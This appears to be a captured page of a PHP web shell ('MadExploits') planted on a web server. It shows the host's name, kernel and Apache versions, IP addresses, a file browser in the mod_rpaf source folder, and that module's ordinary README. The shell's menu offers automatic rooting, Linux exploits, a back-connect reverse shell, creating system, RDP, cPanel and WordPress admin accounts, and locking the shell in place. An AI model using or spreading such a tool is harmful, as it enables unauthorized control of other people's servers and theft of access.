Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
local /
src /
mod_rpaf-0.8.4 /
[ HOME SHELL ]
Name
Size
Permission
Action
.libs
[ DIR ]
drwxr-xr-x
CHANGES
758
B
-rw-rw-r--
Makefile
419
B
-rw-rw-r--
README.md
2.72
KB
-rw-rw-r--
apxs.sh
261
B
-rwxrwxr-x
mod_rpaf.c
14.79
KB
-rw-rw-r--
mod_rpaf.la
925
B
-rw-r--r--
mod_rpaf.lo
276
B
-rw-r--r--
mod_rpaf.o
12.94
KB
-rw-r--r--
mod_rpaf.slo
0
B
-rw-r--r--
mod_rpaf.spec
1.29
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
## mod_rpaf - reverse proxy add forward ### Summary Sets `REMOTE_ADDR`, `HTTPS`, and `HTTP_PORT` to the values provided by an upstream proxy. Sets `remoteip-proxy-ip-list` field in r->notes table to list of proxy intermediaries. ### Compile Debian/Ubuntu Package and Install sudo apt-get install build-essential apache2-threaded-dev yada make make install ### Compile and Install for RedHat/CentOS yum install httpd-devel make make install ### Configuration Directives RPAF_Enable (On|Off) - Enable reverse proxy add forward RPAF_ProxyIPs 127.0.0.1 10.0.0.0/24 - What IPs & bitmaksed subnets to adjust requests for RPAF_Header X-Forwarded-For - The header to use for the real IP address. RPAF_SetHostName (On|Off) - Update vhost name so ServerName & ServerAlias work RPAF_SetHTTPS (On|Off) - Set the HTTPS environment variable to the header value contained in X-HTTPS, or X-Forwarded-HTTPS. For best results make sure that mod_ssl is NOT enabled. RPAF_SetPort (On|Off) - Set the server port to the header value contained in X-Port, or X-Forwarded-Port. (See Issue #12) RPAF_ForbidIfNotProxy (On|Off) - Option to forbid request if not from trusted RPAF_ProxyIPs; otherwise cannot be done with Allow/Deny after remote addr substitution ## Example Configuration LoadModule rpaf_module modules/mod_rpaf.so RPAF_Enable On RPAF_ProxyIPs 127.0.0.1 10.0.0.0/24 RPAF_SetHostName On RPAF_SetHTTPS On RPAF_SetPort On RPAF_ForbidIfNotProxy Off ## Authors * Thomas Eibner <thomas@stderr.net> * Geoffrey McRae <gnif@xbmc.org> * Proxigence Inc. <support@proxigence.com> ## License and distribution This software is licensed under the [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0). The latest version is available [from GitHub](http://github.com/gnif/mod_rpaf)
Close